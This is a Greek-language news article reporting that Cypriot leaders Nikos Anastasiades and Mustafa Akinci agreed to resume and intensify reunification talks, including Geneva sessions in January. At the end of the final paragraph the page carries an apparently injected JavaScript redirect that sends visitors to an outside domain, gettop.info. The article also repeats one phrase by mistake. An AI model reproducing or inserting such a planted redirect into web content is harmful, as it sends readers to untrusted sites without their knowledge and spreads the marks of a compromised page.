Επανάληψη των συνομιλιών αποφάσισαν Αναστασιάδης-Ακιντζί

0
12

 

Επανάληψη και εντατικοποίηση των συνομιλιών γα το Κυπριακό, με κορύφωση το τριήμερο 9 με 11 Ιανουαρίου στη Γενεύη, αποφάσισαν ο Νίκος Αναστασιάδης και ο Μουσταφά Ακιντζί. Παράλληλα, αποφάσισαν να παρουσιαστούν χάρτες επί του εδαφικού, ενώ στις 12 Ιανουαρίου θα πραγματοποιηθεί πολυμερής διάσκεψη και πολυμερή διάσκεψη.

Σύμφωνα με ανακοίνωση των Ηνωμένων Εθνών, οι ηγέτες αποφάσισαν να επαναρχίσουν αμέσως τις διαπραγματεύσεις. Προστίθεται ότι έδωσαν εντολή στους διαπραγματευτές τους να συνεχίσουν να συναντιούνται, προκειμένου να επιτευχθεί περαιτέρω πρόοδος σε όλα τα ζητήματα που εκκρεμούν, ενώ οι ίδιοι θα συναντιούνται όταν απαιτείται. Σε ό,τι αφορά τη διάσκεψη στις 12 Ιανουαρίου, τα Ηνωμένα Εθνη αναφέρουν ότι θα συγκληθεί με την πρόσθετη συμμετοχή των εγγυητριών δυνάμεων και σε αυτή θα προσκληθούν όσα άλλα ενδιαφερόμενα μέρη απαιτείται.

Για τις εξελίξεις αναμένεται να ενημερώσει σήμερα τον Πρωθυπουργό Αλέξη Τσίπρα, ο Πρόεδρος Αναστασιάδης.

Ο ειδικός σύμβουλος του Γενικού Γραμματέα στο Κυπριακό Εσπεν Μπάρθ Έιντε έπειτα από ένα τετράωρο δείπνο που παρέθεσε στου δύο ηγέτες, ανέφερε ότι εντατικοποιείται ο διάλογος. Στόχος, τόνισε, είναι να καλυφθούν κενά και διαφωνίες που υπάρχουν και να γίνει διασταυρούμενη συζήτηση εφ’ όλης της ύλης και επί των έξι κεφαλαίων, ώστε να επιτευχθεί περαιτέρω πρόοδος και να οδηγηθεί η διαδικασία σε κάποιο τελικό στάδιο και κατ’ ευχήν σε επιτυχία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here